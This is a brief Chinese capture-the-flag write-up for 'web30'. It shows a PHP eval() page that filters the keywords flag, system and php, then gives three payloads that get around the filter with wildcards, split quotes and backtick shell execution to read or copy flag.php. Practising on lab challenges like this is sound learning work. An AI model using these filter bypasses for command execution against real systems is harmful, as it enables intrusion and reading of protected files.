web30
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了flag,system,php
flag和php可以使用通配符?或*绕过
system()函数被禁用可以使用别的函数来命令执行
姿势一?c=echo `tac fla?.*`;
姿势二?c=echo `nl fl''ag.p''hp`;查看源代码
姿势三 ?c=`cp fla?.* 1.txt`;
利用反引号命令执行将flag.php复制成1.txt然后访问
<